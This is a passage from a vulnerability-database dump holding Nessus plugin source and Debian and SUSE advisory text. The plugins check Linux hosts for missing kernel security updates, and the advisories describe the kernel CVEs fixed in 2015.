(rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", 
cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", 
reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-source\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:48:58", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\n - CVE-2013-7421 / CVE-2014-9644\n It was discovered that the Crypto API allowed\n unprivileged users to load arbitrary kernel modules. 
A\n local user can use this flaw to exploit vulnerabilities\n in modules that would not normally be loaded.\n\n - CVE-2014-7822\n Akira Fujita found that the splice() system call did not\n validate the given file offset and length. A local\n unprivileged user can use this flaw to cause filesystem\n corruption on ext4 filesystems, or possibly other\n effects.\n\n - CVE-2014-8160\n Florian Westphal discovered that a netfilter\n (iptables/ip6tables) rule accepting packets to a\n specific SCTP, DCCP, GRE or UDPlite port/endpoint could\n result in incorrect connection tracking state. If only\n the generic connection tracking module (nf_conntrack)\n was loaded, and not the protocol-specific connection\n tracking module, this would allow access to any\n port/endpoint of the specified protocol.\n\n - CVE-2014-8559\n It was found that kernel functions that iterate over a\n directory tree can dead-lock or live-lock in case some\n of the directory entries were recently deleted or\n dropped from the cache. A local unprivileged user can\n use this flaw for denial of service.\n\n - CVE-2014-9585\n Andy Lutomirski discovered that address randomisation\n for the vDSO in 64-bit processes is extremely biased. A\n local unprivileged user could potentially use this flaw\n to bypass the ASLR protection mechanism.\n\n - CVE-2014-9683\n Dmitry Chernenkov discovered that eCryptfs writes past\n the end of the allocated buffer during encrypted\n filename decoding, resulting in local denial of service.\n\n - CVE-2015-0239\n It was found that KVM did not correctly emulate the x86\n SYSENTER instruction. An unprivileged user within a\n guest system that has not enabled SYSENTER, for example\n because the emulated CPU vendor is AMD, could\n potentially use this flaw to cause a denial of service\n or privilege escalation in that guest.\n\n - CVE-2015-1420\n It was discovered that the open_by_handle_at() system\n call reads the handle size from user memory a second\n time after validating it. 
A local user with the\n CAP_DAC_READ_SEARCH capability could use this flaw for\n privilege escalation.\n\n - CVE-2015-1421\n It was found that the SCTP implementation could free an\n authentication state while it was still in use,\n resulting in heap corruption. This could allow remote\n users to cause a denial of service or privilege\n escalation.\n\n - CVE-2015-1593\n It was found that address randomisation for the initial\n stack in 64-bit processes was limited to 20 rather than\n 22 bits of entropy. A local unprivileged user could\n potentially use this flaw to bypass the ASLR protection\n mechanism.", "edition": 15, "published": "2015-02-24T00:00:00", "title": "Debian DSA-3170-1 : linux - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "modified": "2015-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-3170.NASL", "href": "https://www.tenable.com/plugins/nessus/81449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3170. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81449);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\", \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\", \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_xref(name:\"DSA\", value:\"3170\");\n\n script_name(english:\"Debian DSA-3170-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\n - CVE-2013-7421 / CVE-2014-9644\n It was discovered that the Crypto API allowed\n unprivileged users to load arbitrary kernel modules. A\n local user can use this flaw to exploit vulnerabilities\n in modules that would not normally be loaded.\n\n - CVE-2014-7822\n Akira Fujita found that the splice() system call did not\n validate the given file offset and length. A local\n unprivileged user can use this flaw to cause filesystem\n corruption on ext4 filesystems, or possibly other\n effects.\n\n - CVE-2014-8160\n Florian Westphal discovered that a netfilter\n (iptables/ip6tables) rule accepting packets to a\n specific SCTP, DCCP, GRE or UDPlite port/endpoint could\n result in incorrect connection tracking state. 
If only\n the generic connection tracking module (nf_conntrack)\n was loaded, and not the protocol-specific connection\n tracking module, this would allow access to any\n port/endpoint of the specified protocol.\n\n - CVE-2014-8559\n It was found that kernel functions that iterate over a\n directory tree can dead-lock or live-lock in case some\n of the directory entries were recently deleted or\n dropped from the cache. A local unprivileged user can\n use this flaw for denial of service.\n\n - CVE-2014-9585\n Andy Lutomirski discovered that address randomisation\n for the vDSO in 64-bit processes is extremely biased. A\n local unprivileged user could potentially use this flaw\n to bypass the ASLR protection mechanism.\n\n - CVE-2014-9683\n Dmitry Chernenkov discovered that eCryptfs writes past\n the end of the allocated buffer during encrypted\n filename decoding, resulting in local denial of service.\n\n - CVE-2015-0239\n It was found that KVM did not correctly emulate the x86\n SYSENTER instruction. An unprivileged user within a\n guest system that has not enabled SYSENTER, for example\n because the emulated CPU vendor is AMD, could\n potentially use this flaw to cause a denial of service\n or privilege escalation in that guest.\n\n - CVE-2015-1420\n It was discovered that the open_by_handle_at() system\n call reads the handle size from user memory a second\n time after validating it. A local user with the\n CAP_DAC_READ_SEARCH capability could use this flaw for\n privilege escalation.\n\n - CVE-2015-1421\n It was found that the SCTP implementation could free an\n authentication state while it was still in use,\n resulting in heap corruption. This could allow remote\n users to cause a denial of service or privilege\n escalation.\n\n - CVE-2015-1593\n It was found that address randomisation for the initial\n stack in 64-bit processes was limited to 20 rather than\n 22 bits of entropy. 
A local unprivileged user could\n potentially use this flaw to bypass the ASLR protection\n mechanism.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-7421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-7822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-8160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-8559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3170\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 3.2.65-1+deb7u2. 
Additionally this update fixes regressions\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon (a subset is fixed already).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.65-1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:39:56", "description": "This update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is now\nunlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\nIt was discovered that under specific circumstances, a combination of\nwrite operations to write-combined memory and locked CPU instructions\nmay cause a core hang on AMD 16h 00h through 0Fh processors. A local\nuser can use this flaw to mount a denial of service (system hang) via\na crafted application.\n\nFor more information please refer to the AMD CPU erratum 793\nin\nhttp://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.\npdf\n\nCVE-2014-7822\n\nIt was found that the splice() system call did not validate the given\nfile offset and length. 
A local unprivileged user can use this flaw to\ncause filesystem corruption on ext4 filesystems, or possibly other\neffects.\n\nCVE-2014-8133\n\nIt was found that the espfix functionality can be bypassed by\ninstalling a 16-bit RW data segment into GDT instead of LDT (which\nespfix checks for) and using it for stack. A local unprivileged user\ncould potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\nIt was found that the espfix functionality is wrongly disabled in a\n32-bit KVM guest. A local unprivileged user could potentially use this\nflaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\nIt was found that a netfilter (iptables or ip6tables) rule accepting\npackets to a specific SCTP, DCCP, GRE or UDPlite port/endpoint could\nresult in incorrect connection tracking state. If only the generic\nconnection tracking module (nf_conntrack) was loaded, and not the\nprotocol-specific connection tracking module, this would allow access\nto any port/endpoint of the specified protocol.\n\nCVE-2014-9420\n\nIt was found that the ISO-9660 filesystem implementation (isofs)\nfollows arbitrarily long chains, including loops, of Continuation\nEntries (CEs). This allows local users to mount a denial of service\nvia a crafted disc image.\n\nCVE-2014-9584\n\nIt was found that the ISO-9660 filesystem implementation (isofs) does\nnot validate a length value in the Extensions Reference (ER) System\nUse Field, which allows local users to obtain sensitive information\nfrom kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\nIt was discovered that address randomisation for the vDSO in 64-bit\nprocesses is extremely biassed. A local unprivileged user could\npotentially use this flaw to bypass the ASLR protection mechanism.\n\nCVE-2015-1421\n\nIt was found that the SCTP implementation could free authentication\nstate while it was still in use, resulting in heap corruption. 
This\ncould allow remote users to cause a denial of service or privilege\nescalation.\n\nCVE-2015-1593\n\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy. A\nlocal unprivileged user could potentially use this flaw to bypass the\nASLR protection mechanism.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 15, "published": "2015-03-26T00:00:00", "title": "Debian DLA-155-1 : linux-2.6 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2014-8134", "CVE-2014-9420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-9584", "CVE-2013-6885", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9585"], "modified": "2015-03-26T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg", "cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:firmware-linux-free", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-doc-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64", 
"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-manual-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-source-2.6.32", "p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-base", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-tools-2.6.32", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686", 
"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686"], "id": "DEBIAN_DLA-155.NASL", "href": "https://www.tenable.com/plugins/nessus/82138", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-155-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82138);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6885\", \"CVE-2014-7822\", \"CVE-2014-8133\", \"CVE-2014-8134\", \"CVE-2014-8160\", \"CVE-2014-9420\", \"CVE-2014-9584\", \"CVE-2014-9585\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_bugtraq_id(63983, 71650, 71684, 71717, 71883, 71990, 72061, 72347, 72356, 72607);\n\n script_name(english:\"Debian DLA-155-1 : linux-2.6 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is now\nunlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\nIt was discovered that under specific circumstances, a combination of\nwrite operations to write-combined memory and locked CPU instructions\nmay cause a core hang on AMD 16h 00h through 0Fh processors. 
A local\nuser can use this flaw to mount a denial of service (system hang) via\na crafted application.\n\nFor more information please refer to the AMD CPU erratum 793\nin\nhttp://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.\npdf\n\nCVE-2014-7822\n\nIt was found that the splice() system call did not validate the given\nfile offset and length. A local unprivileged user can use this flaw to\ncause filesystem corruption on ext4 filesystems, or possibly other\neffects.\n\nCVE-2014-8133\n\nIt was found that the espfix functionality can be bypassed by\ninstalling a 16-bit RW data segment into GDT instead of LDT (which\nespfix checks for) and using it for stack. A local unprivileged user\ncould potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\nIt was found that the espfix functionality is wrongly disabled in a\n32-bit KVM guest. A local unprivileged user could potentially use this\nflaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\nIt was found that a netfilter (iptables or ip6tables) rule accepting\npackets to a specific SCTP, DCCP, GRE or UDPlite port/endpoint could\nresult in incorrect connection tracking state. If only the generic\nconnection tracking module (nf_conntrack) was loaded, and not the\nprotocol-specific connection tracking module, this would allow access\nto any port/endpoint of the specified protocol.\n\nCVE-2014-9420\n\nIt was found that the ISO-9660 filesystem implementation (isofs)\nfollows arbitrarily long chains, including loops, of Continuation\nEntries (CEs). 
This allows local users to mount a denial of service\nvia a crafted disc image.\n\nCVE-2014-9584\n\nIt was found that the ISO-9660 filesystem implementation (isofs) does\nnot validate a length value in the Extensions Reference (ER) System\nUse Field, which allows local users to obtain sensitive information\nfrom kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\nIt was discovered that address randomisation for the vDSO in 64-bit\nprocesses is extremely biassed. A local unprivileged user could\npotentially use this flaw to bypass the ASLR protection mechanism.\n\nCVE-2015-1421\n\nIt was found that the SCTP implementation could free authentication\nstate while it was still in use, resulting in heap corruption. This\ncould allow remote users to cause a denial of service or privilege\nescalation.\n\nCVE-2015-1593\n\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy. A\nlocal unprivileged user could potentially use this flaw to bypass the\nASLR protection mechanism.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.pdf\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5360cb0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/02/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/linux-2.6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firmware-linux-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386\");\n 
